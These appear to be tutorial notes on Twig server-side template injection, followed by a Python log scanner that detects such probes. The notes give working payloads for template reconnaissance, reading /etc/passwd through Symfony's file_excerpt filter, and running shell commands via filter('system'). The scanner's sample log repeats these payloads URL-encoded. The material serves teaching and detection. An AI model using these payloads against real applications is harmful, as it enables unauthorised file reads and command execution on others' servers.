Exploiting SSTI - Twig

Exploitation Techniques

  1. Understanding Twig:

    • Twig is a template engine used in PHP applications.

    • It allows for dynamic content generation, but when untrusted input reaches the template source itself (rather than being passed in as a variable) it becomes exploitable through server-side template injection (SSTI).

  2. Information Disclosure:

    • Obtain Template Information:

      • Use the following payload to get basic information about the current template:

        {{ _self }}

      • Access the application at:

        http://<SERVER_IP>:<PORT>/
      • Note: The information obtained is limited compared to other template engines like Jinja.

  3. Local File Inclusion (LFI):

    • Read Local Files:

      • Twig itself has no filter for reading local files, but the file_excerpt filter provided by Symfony's Twig bridge can be used for this, so the technique only works when the application is built on Symfony:

        {{ "/etc/passwd"|file_excerpt(1,-1) }}

      • Access the application at:

        http://<SERVER_IP>:<PORT>/

  4. Remote Code Execution (RCE):

    • Execute Commands:

      • Twig's filter filter accepts a callable and applies it to every element of an array. Passing the name of PHP's built-in system function as a string makes Twig call it on the array element, which yields remote code execution:

        {{ ['id'] | filter('system') }}

      • Access the application at:

        http://<SERVER_IP>:<PORT>/
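
From the defensive side, the three payloads above leave distinctive traces in web-server access logs. The following Python is an added example, not part of these notes: it URL-decodes each request path (including double-encoded ones, a common filter-evasion trick) and grades Twig SSTI probes by what they reach for (template reconnaissance, file read, code execution). The log lines and IP addresses are constructed, not real traffic.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (not real traffic): one benign request, this page's three probes URL-encoded, one double-encoded probe.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /?name=alice HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /?name=%7B%7B%20_self%20%7D%7D HTTP/1.1" 200 640
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /?name=%7B%7B%20%22%2Fetc%2Fpasswd%22%7Cfile_excerpt%281%2C-1%29%20%7D%7D HTTP/1.1" 200 2048
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /?name=%7B%7B%20%5B%27id%27%5D%20%7C%20filter%28%27system%27%29%20%7D%7D HTTP/1.1" 200 700
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /?name=%257B%257B%2520_self%2520%257D%257D HTTP/1.1" 200 640
"""

REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')

# Most severe first; the first matching class wins.
SIGNATURES = [
    # Twig's filter() handed a quoted string calls that PHP function by name.
    ("rce", re.compile(r"\|\s*filter\s*\(\s*['\"]")),
    # Symfony's file_excerpt filter returns file contents from disk.
    ("file-read", re.compile(r"\|\s*file_excerpt\s*\(")),
    ("recon", re.compile(r"\{\{\s*_self\s*\}\}")),
    ("template-syntax", re.compile(r"\{\{.*?\}\}|\{%.*?%\}")),
]

def normalize(path, rounds=3):
    """URL-decode until stable: double encoding is a common filter-evasion trick."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def classify(path):
    """Return the severity class of an SSTI probe in a request path, or None."""
    decoded = normalize(path)
    for label, pattern in SIGNATURES:
        if pattern.search(decoded):
            return label
    return None

def scan_log(text):
    """Return (client_ip, class, decoded_path) for every flagged request."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if m and (label := classify(m["path"])):
            hits.append((m["ip"], label, normalize(m["path"])))
    return hits
```

Running scan_log(SAMPLE_LOG) flags four of the five constructed requests, with the double-encoded probe classified the same as its plain counterpart.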
